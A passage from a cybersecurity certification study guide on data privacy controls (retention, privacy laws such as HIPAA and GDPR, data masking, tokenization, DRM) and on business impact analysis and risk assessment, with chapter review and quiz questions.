Chapter 3, “Vulnerability Management Activities.”
Classification
Data classification helps to ensure that appropriate
security measures are taken with regard to sensitive data
types and is covered in Chapter 13, “The Importance of
Proactive Threat Hunting.”
Ownership
In Chapter 21, “The Importance of Frameworks, Policies,
Procedures, and Controls,” you will learn more about
policies that act as non-technical controls. One of those
policies is the data ownership policy, which is closely
related to the data classification policy (covered Chapter
13). Often, the two policies are combined because,
typically, the data owner is tasked with classifying the
data. Therefore, the data ownership policy covers how
the owner of each piece of data or each data set is
identified. In most cases, the creator of the data is the
owner, but some organizations may deem all data
created by a department to be owned by the department
head. Another way a user may become the owner of data
is by introducing into the organization data the user did
not create. Perhaps the data was purchased from a third
party. In any case, the data ownership policy should
outline both how data ownership occurs and the
responsibilities of the owner with respect to determining
the data classification and identifying those with access
to the data.
Retention
Another policy that acts as a non-technical control is the
data retention policy, which outlines how various data
types must be retained and may rely on the data
classifications described in the data classification policy.
Data retention requirements vary based on several
factors, including data type, data age, and legal and
regulatory requirements. Security professionals must
understand where data is stored and the type of data
stored. In addition, security professionals should provide
guidance on managing and archiving data securely.
Therefore, each data retention policy must be established
with the help of organizational personnel.
A data retention policy usually identifies the purpose of
the policy, the portion of the organization affected by the
policy, any exclusions to the policy, the personnel
responsible for overseeing the policy, the personnel
responsible for data destruction, the data types covered
by the policy, and the retention schedule. Security
professionals should work with data owners to develop
the appropriate data retention policy for each type of
data the organization owns. Examples of data types
include, but are not limited to, human resources data,
accounts payable/receivable data, sales data, customer
data, and e-mail. Designing a data retention policy is
covered more fully in the upcoming section “Retention
Standards.”
Data Types
Categorizing data types is a non-technical control for
ensuring data privacy and protection. To properly
categorize data types, a security analyst should be
familiar with some of the most sensitive types of data
that the organization may possess, as described in the
sections that follow.
Personally Identifiable Information (PII)
When considering technology and its use today, privacy
is a major concern of users. This privacy concern usually
involves three areas: which personal information can be
shared with whom, whether messages can be exchanged
confidentially, and whether and how one can send
messages anonymously. Privacy is an integral part of any
security measures that an organization takes. As part of
the security measures that organizations must take to
protect privacy, PII must be understood, identified, and
protected. Refer to Chapter 15 for more details about
protecting PII.
Personal Health Information (PHI)
PHI is a particular type of PII that an organization may
possess, particularly healthcare organizations. Chapter
15 also provides more details about protecting PHI.
Payment Card Information
Another type of PII that almost all companies possess is
credit card data. Holders of this data must protect it.
Many of the highest-profile security breaches that have
occurred have involved the theft of this data. The
Payment Card Industry Data Security Standard
(PCI DSS) applies to this type of data. The handling of
payment card information is covered in Chapter 5,
“Threats and Vulnerabilities Associated with Specialized
Technology.”
Retention Standards
Retention standards are another non-technical control
for ensuring data privacy and protection. To design a
data retention policy, an organization should answer the
following questions:
• What are the legal/regulatory requirements and
business needs for the data?
• What are the types of data?
• What are the retention periods and destruction
needs of the data?
The personnel who are most familiar with each data type
should work with security professionals to determine the
data retention policy. For example, human resources
personnel should help design the data retention policy
for all human resources data. While designing a data
retention policy, the organization must consider the
media and hardware that will be used to retain the data.
Then, with this information in hand, the data retention
policy should be drafted and formally adopted by the
organization and/or business unit.
Once a data retention policy has been created, personnel
must be trained to comply with it. Auditing and
monitoring should be configured to ensure data
retention policy compliance. Periodically, data owners
and processors should review the data retention policy to
determine whether any changes need to be made. All
data retention policies, implementation plans, training,
and auditing should be fully documented.
Remember that for most organizations, a one-size-fits-all
solution is impossible because of the different types of
data. Only those most familiar with each data type can
determine the best retention policy for that data. While a
security professional should be involved in the design of
the data retention policies, the security professional is
there to ensure that data security is always considered
and that data retention policies satisfy organizational
needs. The security professional should only act in an
advisory role and should provide expertise when needed.
Confidentiality
The three fundamentals of security are confidentiality,
integrity, and availability (CIA). Most security issues
result in a violation of at least one facet of the CIA triad.
Understanding these three security principles will help
security professionals ensure that the security controls
and mechanisms implemented protect at least one of
these principles.
To ensure confidentiality, you must prevent the
disclosure of data or information to unauthorized
entities. As part of confidentiality, the sensitivity level of
data must be determined before any access controls are
put in place. Data with a higher sensitivity level will have
more access controls in place than data with a lower
sensitivity level. The opposite of confidentiality is
disclosure. Most security professionals consider
confidentiality as it relates to data on a network or
devices. However, data can also exist in printed format.
Appropriate controls should be put into place to protect
data on a network, but data in its printed format needs to
be protected, too, which involves implementing data
disposal policies. Examples of controls that improve
confidentiality include encryption, steganography, access
control lists (ACLs), and data classification.
Legal Requirements
Legal requirements are a form of non-technical controls
that can mandate technical controls. In some cases, the
design of controls will be driven by legal requirements
that apply to the organization based on the industry or
sector in which it operates. In Chapter 15 you learned the
importance of recognizing legal responsibilities during
an incident response. Let’s examine some of the laws and
regulations that may come into play.
The United States and European Union (EU) both have
established laws and regulations that affect organizations
that operate within their area of governance. While
security professionals should strive to understand laws
and regulations, security professionals may not have the
level of knowledge and background to fully interpret
these laws and regulations to protect their organization.
In these cases, security professionals should work with
legal representation regarding legislative or regulatory
compliance.
Security analysts must be aware of the laws and, at a
minimum, understand how the laws affect the operations
of their organization. For example, a security
professional working for a healthcare facility would need
to understand all security guidelines in HIPAA and
PPACA, described next. The following are the most
significant laws that may affect an organization and its
security policy:
• Sarbanes-Oxley Act (SOX): Also known as the
Public Company Accounting Reform and Investor
Protection Act of 2002, affects any organization
that is publicly traded in the United States. It
controls the accounting methods and financial
reporting for the organizations and stipulates
penalties and even jail time for executive officers.
• Health Insurance Portability and
Accountability Act (HIPAA): Also known as
the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies,
and healthcare clearinghouses. It is enforced by
the Office of Civil Rights (OCR) of the Department
of Health and Human Services (HSS). It provides
standards and procedures for storing, using, and
transmitting medical information and healthcare
data. HIPAA overrides state laws unless the state
laws are stricter. It amends the Patient Protection
and Affordable Care Act (PPACA), commonly
known as Obamacare.
• Gramm-Leach-Bliley Act (GLBA) of 1999:
Affects all financial institutions, including banks,
loan companies, insurance companies, investment
companies, and credit card providers. It provides
guidelines for securing all financial information
and prohibits sharing financial information with
third parties. This act directly affects the security
of PII.
• Computer Fraud and Abuse Act (CFAA) of
1986: Affects any entities that engage in hacking
of “protected computers,” as defined in the act. It
was amended in 1989, 1994, and 1996; in 2001 by
the USA PATRIOT Act (listed below); in 2002;
and in 2008 by the Identity Theft Enforcement
and Restitution Act. A “protected computer” is a
computer used exclusively by a financial
institution or the U.S. government or used in or
affecting interstate or foreign commerce or
communication, including a computer located
outside the United States that is used in a manner
that affects interstate or foreign commerce or
communication of the United States. Due to the
inter-state nature of most Internet
communication, any ordinary computer has come
under the jurisdiction of the law, including cell
phones. The law includes several definitions of
hacking, including knowingly accessing a
computer without authorization; intentionally
accessing a computer to obtain financial records,
U.S. government information, or protected
computer information; and transmitting
fraudulent commerce communication with the
intent to extort.
• Federal Privacy Act of 1974: Affects any
computer that contains records used by a federal
agency. It provides guidelines on collection,
maintenance, use, and dissemination of PII about
individuals that is maintained in systems of
records by federal agencies on collecting,
maintaining, using, and distributing PII.
• Federal Intelligence Surveillance Act
(FISA) of 1978: Affects law enforcement and
intelligence agencies. It was the first act to give
procedures for the physical and electronic
surveillance and collection of “foreign intelligence
information” between “foreign powers” and
“agents of foreign powers” and applied only to
traffic within the United States. It was amended
by the USA PATRIOT Act of 2001 and the FISA
Amendments Act of 2008.
• Electronic Communications Privacy Act
(ECPA) of 1986: Affects law enforcement and
intelligence agencies. It extended government
restrictions on wiretaps from telephone calls to
include transmissions of electronic data by
computer and prohibited access to stored
electronic communications. It was amended by
the Communications Assistance to Law
Enforcement Act (CALEA) of 1994, the USA
PATRIOT Act of 2001, and the FISA Amendments
Act of 2008.
• Computer Security Act of 1987: Superseded
in 2002 by FISMA (listed below), the first law to
require a formal computer security plan. It was
written to protect and defend the sensitive
information in the federal government systems
and provide security for that information. It also
placed requirements on government agencies to
train employees and identify sensitive systems.
• United States Federal Sentencing
Guidelines of 1991: Affects individuals and
organizations convicted of felonies and serious
(Class A) misdemeanors. It provides guidelines to
prevent sentencing disparities that existed across
the United States.
• Communications Assistance for Law
Enforcement Act (CALEA) of 1994: Affects
law enforcement and intelligence agencies. It
requires telecommunications carriers and
manufacturers of telecommunications equipment
to modify and design their equipment, facilities,
and services to ensure that they have built-in
surveillance capabilities. This allows federal
agencies to monitor all telephone, broadband
Internet, and voice over IP (VoIP) traffic in real
time.
• Personal Information Protection and
Electronic Documents Act (PIPEDA):
Affects how private-sector organizations collect,
use, and disclose personal information in the
course of commercial business in Canada. The act
was written to address EU concerns about the
security of PII in Canada. The law requires
organizations to obtain consent when they collect,
use, or disclose personal information and to have
personal information policies that are clear,
understandable, and readily available.
• Basel II: Affects financial institutions. It
addresses minimum capital requirements,
supervisory review, and market discipline. Its
main purpose is to protect against risks that banks
and other financial institutions face.
• Federal Information Security
Management Act (FISMA) of 2002: Affects
every federal agency. It requires federal agencies
to develop, document, and implement an
agencywide information security program.
• Economic Espionage Act of 1996: Affects
companies that have trade secrets and any
individuals who plan to use encryption technology
for criminal activities. This act covers a multitude
of issues because of the way it was structured. A
trade secret does not need to be tangible to be
protected by this act. Per this law, theft of a trade
secret is now a federal crime, and the United
States Sentencing Commission must provide
specific information in its reports regarding
encryption or scrambling technology that is used
illegally.
• USA PATRIOT Act of 2001: Formally known as
Uniting and Strengthening America by Providing
Appropriate Tools Required to Intercept and
Obstruct Terrorism, it affects law enforcement
and intelligence agencies in the United States. Its
purpose is to enhance the investigatory tools that
law enforcement can use, including e-mail
communications, telephone records, Internet
communications, medical records, and financial
records. When this law was enacted, it amended
several other laws, including FISA and the ECPA
of 1986. The USA PATRIOT Act does not restrict
private citizens’ use of investigatory tools,
although there are some exceptions—for example,
if the private citizen is acting as a government
agent (even if not formally employed), if the
private citizen conducts a search that would
require law enforcement to have a warrant, if the
government is aware of the private citizen’s
search, or if the private citizen is performing a
search to help the government.
• Health Care and Education Reconciliation
Act of 2010: Affects healthcare and educational
organizations. This act increased some of the
security measures that must be taken to protect
healthcare information.
• Employee Privacy Issues and Expectation
of Privacy: Employee privacy issues must be
addressed by all organizations to ensure that the
organizations are protected from costly legal
penalties that result from data breaches. However,
organizations must give employees the proper
notice of any monitoring that might be used.
Organizations must also ensure that the
monitoring of employees is applied in a consistent
manner. Many organizations implement a noexpectation-of-privacy policy that the employee
must sign after receiving the appropriate training.
This policy should specifically describe any
unacceptable behavior. Companies should also
keep in mind that some actions are protected by
the Fourth Amendment. Security professionals
and senior management should consult with legal
counsel when designing and implementing any
monitoring solution.
• European Union: The EU has implemented
several laws and regulations that affect security
and privacy. The EU Principles on Privacy include
strict laws to protect private data. The EU’s Data
Protection Directive provides direction on how to
follow the laws set forth in the principles. The EU
created the Safe Harbor Privacy Principles to help
guide U.S. organizations in compliance with the
EU Principles on Privacy. The following are some
of the guidelines as updated by the General Data
Protection Regulation (GDPR). Personal data may
not be processed unless there is at least one legal
basis to do so. Article 6 states the lawful purposes
are
• If the data subject has given consent to the
processing of his or her personal data
• To fulfill contractual obligations with a data
subject, or for tasks at the request of a data
subject who is in the process of entering into a
contract
• To comply with a data controller's legal obligations
• To protect the vital interests of a data subject or
another individual
• To perform a task in the public interest or in
official authority
• For the legitimate interests of a data controller or
a third party, unless these interests are overridden
by interests of the data subject or her or his rights
according to the Charter of Fundamental Rights
(especially in the case of children)
Note
Do not confuse the terms safe harbor and data haven. According to the EU, a
safe harbor is an entity that conforms to all the requirements of the EU
Principles on Privacy. A data haven is a country that fails to legally protect
personal data, with the main aim being to attract companies engaged in the
collection of the data.
The EU Electronic Security Directive defines electronic
signature principles. In this directive, a signature must
be uniquely linked to the signer and to the data to which
it relates so that any subsequent data change is
detectable. The signature must be capable of identifying
the signer.
Data Sovereignty
Data sovereignty is the concept that data stored in
digital format is subject to the laws of the country in
which the data is located. Affecting this concept are the
differing privacy laws and regulations issued by nations
and governing bodies. This concept is further
complicated by the deploying of cloud solutions.
Many countries have adopted legislation that requires
customer data to be kept within the country in which the
customer resides. But organizations are finding it
increasingly difficult to ensure that this is the case when
working with service providers and other third parties.
Organizations should consult with the service-level
agreements (SLAs) with these providers to verify
compliance.
Keep in mind, however, that the laws of multiple
countries may affect the data. For instance, suppose an
organization in the United States is using a data center in
the United States but the data center is operated by a
company from France. The data would then be subject to
both U.S. and EU laws and regulations.
Another factor would be the type of data being stored, as
different types of data are regulated differently.
Healthcare data and consumer data have vastly separate
laws that regulate the transportation and storage of data.
Security professionals should answer the following
questions:
• Where is the data stored?
• Who has access to the data?
• Where is the data backed up?
• How is the data encrypted?
The answers to these four questions will help security
professionals design a governance strategy for their
organization that will aid in addressing any data
sovereignty concerns. Remember that the responsibility
to meet data regulations falls on both the organization
that owns the data and the vendor providing the data
storage service, if any.
Data Minimization
Organizations should minimize the amount of personal
data they store to what is necessary. An important
principle in the European Union’s General Data
Protection Regulation (GDPR) is data minimization.
Data processing should only use as much data as is
required to successfully accomplish a given task. By
reducing the amount of personal data, the attack surface
is also reduced.
Purpose Limitation
Another key principle in the European Union’s GDPR
that is finding wide adoption is that of purpose
limitation. Personal data collected for one purpose
cannot be repurposed without further consent from the
individual. For example data collected to track a disease
outbreak cannot be used to identify individuals.
Non-disclosure agreement (NDA)
In Chapter 15 you learned about various types of
intellectual property, such as patents, copyrights, and
trade secrets. Most organizations that have trade secrets
attempt to protect them by using NDAs. An NDA must
be signed by any entity that has access to information
that is part of a trade secret. Anyone who signs an NDA
will suffer legal consequences if the organization is able
to prove that the signer violated it.
TECHNICAL CONTROLS
Technical controls are implemented with technology and
include items such as firewalls, access lists (ACLs),
permissions on files and folders, and devices that
identify and prevent threats. After it understands the
threats, an organization needs to establish likelihoods
and impacts, and it needs to select controls that, while
addressing a threat, do not cost more than the cost of the
realized threat. The review of these controls should be an
ongoing process.
Encryption
In Chapter 8, “Security Solutions for Infrastructure
Management,” you learned about encryption and
cryptography. These technologies comprise a technical
control that can be used to provide the confidentiality
objective of the CIA triad. Information assets can be
protected from being accessed by unauthorized parties
by encrypting data at rest (while stored) and data in
transit (when crossing a network). As you also learned,
cryptography in the form of hashing algorithms can also
provide a way to asses data integrity.
Data Loss Prevention (DLP)
Chapter 12, “Implementing Configuration Changes to
Existing Controls to Improve Security,” described data
loss prevention (DLP) systems. As you learned, DLP
systems are used to prevent data exfiltration, which is
the intentional or unintentional loss of sensitive data
from the network. DLP comprises a strong technical
control that protects both integrity and confidentiality.
Data Masking
Data masking means altering data from its original
state to protect it. You already learned about two forms
of masking, encryption (storing the data in an encrypted
form) and hashing (storing a hash value, generated from
the data by a hashing algorithm, rather than the data
itself). Many passwords are stored as hash values.
The following are some other methods of data masking:
• Using substitution tables and aliases for the data
• Redacting or replacing the sensitive data with a
random value
• Averaging or taking individual values and
averaging them (adding them and then dividing
by the number of individual values) or aggregating
them (totaling them and using only the total
value)
Deidentification
Data deidentification or data anonymization is the
process of deleting or masking personal identifiers, such
as personal names, from a set of data. Deidentification is
often done when the data is being used in the aggregate,
such as when medical data is used for research. It is a
technical control that is used as one of the main
approaches to ensuring data privacy protection.
Tokenization
Tokenization is another form of data hiding or
masking in that it replaces a value with a token that is
used instead of the actual value. For example,
tokenization is a new emerging standard for mobile
transactions; numeric tokens are used to protect
cardholders’ sensitive credit and debit card information.
This is a great security feature that substitutes the
primary account number with a numeric token that can
be processed by all participants in the payment
ecosystem. Figure 19-1 shows the use of tokens in a credit
card transaction using a smartphone.
Figure 19-1 Tokenization
Digital Rights Management (DRM)
Hardware manufacturers, publishers, copyright holders,
and individuals use digital rights management
(DRM) to control the use of digital content. DRM often
also involves device controls. First-generation DRM
software controls copying. Second-generation DRM
software controls executing, viewing, copying, printing,
and altering works or devices.
The U.S. Digital Millennium Copyright Act
(DMCA) of 1998 imposes criminal penalties on those
who make available technologies whose primary purpose
is to circumvent content protection technologies. DRM
includes restrictive license agreements and encryption.
DRM protects computer games and other software,
documents, e-books, films, music, and television.
In most enterprise implementations, the primary
concern is the DRM control of documents by using open,
edit, print, or copy access restrictions that are granted on
a permanent or temporary basis. Solutions can be
deployed that store the protected data in a central or
decentralized model. Encryption is used in the DRM
implementation to protect the data both at rest and in
transit.
Today’s DRM implementations include the following:
• Directories:
• Lightweight Directory Access Protocol (LDAP)
• Active Directory (AD)
• Custom
• Permissions:
• Open
• Print
• Modify
• Clipboard
• Additional controls:
• Expiration (absolute, relative, immediate
revocation)
• Version control
• Change policy on existing documents
• Watermarking
• Online/offline
• Auditing
• Ad hoc and structured processes:
• User initiated on desktop
• Mapped to system
• Built into workflow process
Document DRM
Organizations implement DRM to protect confidential or
sensitive documents and data. Commercial DRM
products allow organizations to protect documents and
include the capability to restrict and audit access to
documents. Some of the permissions that can be
restricted using DRM products include reading and
modifying a file, removing and adding watermarks,
downloading and saving a file, printing a file, or even
taking screenshots. If a DRM product is implemented,
the organization should ensure that the administrator is
properly trained and that policies are in place to ensure
that rights are appropriately granted and revoked.
Music DRM
DRM has been used in the music industry for some time
now. Subscription-based music services, such as
Napster, use DRM to revoke a user’s access to
downloaded music once their subscription expires. While
technology companies have petitioned the music
industry to allow them to sell music without DRM, the
industry has been reluctant to do so.
Movie DRM
While the movie industry has used a variety of DRM
schemes over the years, two main technologies are used
for the mass distribution of media:
• Content Scrambling System (CSS): Uses
encryption to enforce playback and region
restrictions on DVDs. This system can be broken
using Linux’s DeCSS tool.
• Advanced Access Content System (AACS):
Protects Blu-ray and HD DVD content. Hackers
have been able to obtain the encryption keys to
this system.
This industry continues to make advances to prevent
hackers from creating unencrypted copies of copyrighted
material.
Video Game DRM
Most video game DRM implementations rely on
proprietary consoles that use Internet connections to
verify video game licenses. Most consoles today verify
the license upon installation and allow unrestricted use
from that point. However, to obtain updates, the license
will again be verified prior to download and installation
of the update.
E-Book DRM
E-book DRM is considered to be the most successful
DRM deployment. Both Amazon’s Kindle and Barnes
and Nobles’ Nook devices implement DRM to protect
electronic forms of books. Both of these companies have
released mobile apps that function like the physical ebook devices.
Today’s implementation uses a decryption key that is
installed on the device. This means that the e-books
cannot be easily copied between e-book devices or
applications. Adobe created the Adobe Digital
Experience Protection Technology (ADEPT) that is used
by most e-book readers except Amazon’s Kindle. With
ADEPT, AES is used to encrypt the media content, and
RSA encrypts the AES key.
Watermarking
Digital watermarking is another method used to
deter unauthorized use of a document. Digital
watermarking involves embedding a logo or trademark
in documents, pictures, or other objects. The watermark
deters people from using the materials in an
unauthorized manner.
Geographic Access Requirements
At one time, cybersecurity professionals knew that all the
network users were safely in the office and behind a
secure perimeter created and defended with every tool
possible. That is no longer the case. Users now access
your network from home, wireless hotspots, hotel rooms,
and all sorts of other locations that are less than secure.
When you design authentication, you can consider the
physical location of the source of an access request. A
scenario for this might be that Alice is allowed to access
the Sales folder at any time from the office but only from
9 a.m. to 5 p.m. from her home and never from
elsewhere.
Authentication systems can also use location to identify
requests to authenticate and access a resource from two
different locations in a very short amount of time, one of
which could be fraudulent.
Finally, these systems can sometimes make real-time
assessments of threat levels in the region where a request
originates. Geofencing is the application of geographic
limits to where a device can be used. It depends on the
use of Global Positioning System (GPS) or radio
frequency identification (RFID) technology to create a
virtual geographic boundary.
Access Controls
Chapter 8 covered identity and access management
systems in depth. Along with encryption, access controls
are the main security controls implemented to ensure
confidentiality. In Chapter 21, “The Importance of
Frameworks, Policies, Procedures, and Controls,” you
will learn how access controls fit into the set of controls
used to maintain security.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 19-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 19-2 Key Topics in Chapter 19
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
privacy, Sarbanes-Oxley Act (SOX)
Health Insurance Portability and Accountability Act
(HIPAA)
Gramm-Leach-Bliley Act (GLBA) of 1999
Computer Fraud and Abuse Act (CFAA)
Federal Privacy Act of 1974
Federal Intelligence Surveillance Act (FISA) of 1978
Electronic Communications Privacy Act (ECPA) of
1986
Computer Security Act of 1987
United States Federal Sentencing Guidelines of 1991
Personal Information Protection and Electronic
Documents Act (PIPEDA)
Basel II
Federal Information Security Management Act
(FISMA) of 2002
Economic Espionage Act of 1996
USA PATRIOT Act of 2001
Health Care and Education Reconciliation Act of 2010
employee privacy issues and expectation of privacy
data sovereignty
data masking
deidentification
tokenization
digital rights management (DRM)
U.S. Digital Millennium Copyright Act (DMCA) of
1998
Content Scrambling System (CSS)
Advanced Access Content System (AACS)
digital watermarking
geofencing
REVIEW QUESTIONS
1. Data should be classified based on its ________ to
the organization.
2. List at least two considerations when assigning a
level of criticality.
3. Match the following terms with their definitions.
4. A ________________ policy outlines how
various data types must be retained and may rely
on the data classifications described in the data
classification policy.
5. According to the GPDR, personal data may not be
processed unless there is at least one legal basis to
do so. List at least two of these legal bases.
6. Match the following terms with their definitions.
7. _________________ means altering data from
its original state to protect it.
8. List at least one method of data masking.
9. Match the following terms with their definitions.
10. _________________ is the application of
geographic limits to where a device can be used.
Chapter 20. Applying
Security Concepts in
Support of Organizational
Risk Mitigation
This chapter covers the following topics related
to Objective 5.2 (Given a scenario, apply security
concepts in support of organizational risk
mitigation) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
• Business impact analysis: Describes how to
assess the level of criticality of business functions
to the overall organization
• Risk identification process: Includes
classification, ownership, retention, data types,
retention standards, and confidentiality
• Risk calculation: Covers probability and
magnitude
• Communication of risk factors: Discusses the
process of sharing with critical parties
• Risk prioritization: Includes security controls
and engineering tradeoffs
• System assessment: Describes the process of
system assessment
• Documented compensating controls: Covers
the use of additional controls
• Training and exercises: Includes red team,
blue team, white team, and tabletop exercise
• Supply chain assessment: Covers vendor due
diligence and hardware source authenticity
The risk management process is a formal method of
evaluating vulnerabilities. A robust risk management
process will identify vulnerabilities that need to be
addressed and will generate an assessment of the impact
and likelihood of an attack that takes advantage of the
vulnerability. The process also includes a formal
assessment of possible risk mitigations. This chapter
explores the types of risk management processes and
how they are used to mitigate risk.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these nine self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 20-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 20-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is the first step in the BIA?
a. Identify resource requirements.
b. Identify outage impacts and estimate
downtime.
c. Identify critical processes and resources.
d. Identify recovery priorities.
2. Which of the following is not a goal of risk
assessment?
a. Identify vulnerabilities and threats.
b. Identify key stakeholders.
c. Identify assets and asset value.
d. Calculate threat probability and business
impact.
3. Which of the following is the monetary impact of
each threat occurrence?
a. ALE
b. SLE
c. AV
d. EF
4. The non-technical leadership audience needs which
of the following to be stressed in the
communication of risk factors to stakeholders?
a. The technical risks
b. Security operations difficulties
c. The cost of cybersecurity expenditures
d. Translation of technical risk into common
business terms
5. Which of the following processes involves
terminating the activity that causes a risk or
choosing an alternative that is not as risky?
a. Risk avoidance
b. Risk transfer
c. Risk mitigation
d. Risk acceptance
6. Which of the following occurs when the adequacy
of a system’s overall security is accepted by
management?
a. Certification
b. Accreditation
c. Acceptance
d. Due diligence
7. To implement ISO/IEC 27001:2013, the project
manager should complete which step first?
a. Identify the requirements
b. Obtain management support
c. Perform risk assessment and risk treatment
d. Define the ISMS scope, information security
policy, and information security objectives
8. Which of the following are in place to substitute for
a primary access control and mainly act to mitigate
risks?
a. Compensating controls
b. Secondary controls
c. Accommodating controls
d. Directive controls
9. Which team acts as the attacking force?
a. Green
b. Red
c. Blue
d. White
FOUNDATION TOPICS
BUSINESS IMPACT
ANALYSIS
A business impact analysis (BIA) is a functional
analysis that occurs as part of business continuity and
planning for disaster recovery. Performing a thorough
BIA will help business units understand the impact of a
disaster. The resulting document that is produced from a
BIA lists the critical and necessary business functions,
their resource dependencies, and their level of criticality
to the overall organization.
The BIA helps the organization to understand what
impact a disruptive event would have on the
organization. It is a management-level analysis that
identifies the impact of losing an organization’s
resources.
The four main steps of the BIA are as follows:
1. Identify critical processes and resources.
2. Identify outage impacts and estimate downtime.
3. Identify resource requirements.
4. Identify recovery priorities.
The BIA relies heavily on any vulnerability analysis and
risk assessment that is completed. The vulnerability
analysis and risk assessment may be performed by the
Business Continuity Planning (BCP) committee
or by a separately appointed risk assessment team.
Identify Critical Processes and
Resources
When identifying the critical processes and resources of
an organization, the BCP committee must first identify
all the business units or functional areas within the
organization. After all units have been identified, the
BCP team should select which individuals will be
responsible for gathering all the needed data and select
how to obtain the data. These individuals will gather the
data using a variety of techniques, including
questionnaires, interviews, and surveys. They might also
actually perform a vulnerability analysis and risk
assessment or use the results of these tests as input for
the BIA. During the data gathering, the organization’s
business processes and functions and the resources upon
which these processes and functions depend should be
documented. This list should include all business assets,
including physical and financial assets that are owned by
the organization, and any assets that provide competitive
advantage or credibility.
After determining all the business processes, functions,
and resources, the organization should then determine
the criticality level of each process, function, and
resource. This is done by analyzing the impact that the
loss of each resource would impose on the capability to
continue to do business.
Identify Outage Impacts and
Estimate Downtime
Analyzing the impact that the loss of each resource
would impose on the ability to continue to do business
will provide the raw material to generate metrics used to
determine the extent to which redundancy must be
provided to each resource. You learned about metrics
such as MTD, MTTR, and RTO that are used to assess
downtime and recovery time in Chapter 16, “Applying
the Appropriate Incident Response Procedure.” Please
review those concepts.
Identify Resource Requirements
After the criticality level of each process, function, and
resource is determined, you need to determine all the
resource requirements for each process, function, and
resource. For example, an organization’s accounting
system might rely on a server that stores the accounting
application, another server that holds the database,
various client systems that perform the accounting tasks
over the network, and the network devices and
infrastructure that support the system. Resource
requirements should also consider any human resources
requirements. When human resources are unavailable,
the organization can be just as negatively impacted as
when technological resources are unavailable.
Note
Keep in mind that the priority for any CySA professional should be the safety of
human life. Consider and protect all other organizational resources only after
personnel are safe.
The organization must document the resource
requirements for every resource that would need to be
restored when the disruptive event occurs. This includes
device name, operating system or platform version,
hardware requirements, and device interrelationships.
Identify Recovery Priorities
After all the resource requirements have been identified,
the organization must identify the recovery priorities.
Establish recovery priorities by taking into consideration
process criticality, outage impacts, tolerable downtime,
and system resources. After all this information is
compiled, the result is an information system recovery
priority hierarchy.
Three main levels of recovery priorities should be used:
high, medium, and low. The BIA stipulates the recovery
priorities but does not provide the recovery solutions.
Those are given in the disaster recovery plan (DRP).
Recoverability
Recoverability is the ability of a function or system to
be recovered in the event of a disaster or disruptive
event. As part of recoverability, downtime must be
minimized. Recoverability places emphasis on the
personnel and resources used for recovery.
Fault Tolerance
Fault tolerance is provided when a backup component
begins operation when the primary component fails. One
of the key aspects of fault tolerance is the lack of service
interruption. Varying levels of fault tolerance can be
achieved at most levels of the organization based on how
much an organization is willing to spend. However, the
backup component often does not provide the same level
of service as the primary component. For example, an
organization might implement a high-speed
OC1connection to the Internet. However, the backup
connection to the Internet that is used in the event of the
failure of the OC1 line might be much slower but at a
much lower cost of implementation than the primary
OC1 connection.
RISK IDENTIFICATION
PROCESS
A risk assessment is a tool used in risk management
to identify vulnerabilities and threats, assess the impact
of those vulnerabilities and threats, and determine which
controls to implement. This is also called risk
identification. Risk assessment (or analysis) has four
main goals:
• Identify assets and asset value.
• Identify vulnerabilities and threats.
• Calculate threat probability and business impact.
• Balance threat impact with countermeasure cost.
Prior to starting a risk assessment, management and the
risk assessment team must determine which assets and
threats to consider. This process determines the size of
the project. The risk assessment team must then provide
a report to management on the value of the assets
considered. Management can then review and finalize
the asset list, adding and removing assets as it sees fit,
and then determine the budget of the risk assessment
project.
Let’s look at a specific scenario to help understand the
importance of system-specific risk analysis. In our
scenario, the Sales division decides to implement
touchscreen technology and tablet computers to increase
productivity. As part of this new effort, a new sales
application will be developed that works with the new
technology. At the beginning of the deployment, the chief
security officer (CSO) attempted to prevent the
deployment because the technology is not supported in
the enterprise. Upper management decided to allow the
deployment. The CSO should work with the Sales
division and other areas involved so that the risk
associated with the full life cycle of the new deployment
can be fully documented and appropriate controls and
strategies can be implemented during deployment.
Risk assessment should be carried out before any
mergers and acquisitions occur or new technology and
applications are deployed. If a risk assessment is not
supported and directed by senior management, it will
not be successful. Management must define the purpose
and scope of a risk assessment and allocate the
personnel, time, and monetary resources for the project.
There are several approaches to performing a risk
assessment, covered in the following sections.
Make Risk Determination Based
upon Known Metrics
To make a risk determination, an organization must
perform a formal risk analysis. A formal risk analysis
often asks questions such as these: What corporate
assets need to be protected? What are the business needs
of the organization? What outside threats are most likely
to compromise network security? Different types of risk
analysis, including qualitative risk analysis and
quantitative risk analysis, should be used to ensure that
the data obtained is maximized.
Qualitative Risk Analysis
A qualitative risk analysis does not assign monetary
and numeric values to all facets of the risk analysis
process. Qualitative risk analysis techniques include
intuition, experience, and best practice techniques, such
as brainstorming, focus groups, surveys, questionnaires,
meetings, interviews, and Delphi. The Delphi technique
is a method used to estimate the likelihood and outcome
of future events. Although all these techniques can be
used, most organizations will determine the best
technique(s) based on the threats to be assessed.
Conducting a qualitative risk analysis requires a risk
assessment team that has experience and education
related to assessing threats.
Each member of the group who has been chosen to
participate in the qualitative risk analysis uses his or her
experience to rank the likelihood of each threat and the
damage that might result. After each group member
ranks the threat possibility, loss potential, and safeguard
advantage, data is combined in a report to present to
management.
Two advantages of qualitative over quantitative risk
analysis (discussed next) are that qualitative prioritizes
the risks and identifies areas for immediate
improvement in addressing the threats. Disadvantages of
qualitative risk analysis are that all results are subjective
and a dollar value is not provided for cost/benefit
analysis or for budget help.
Note
When performing risk analyses, all organizations experience issues with any
estimate they obtain. This lack of confidence in an estimate is referred to as
uncertainty and is expressed as a percentage. Any reports regarding a risk
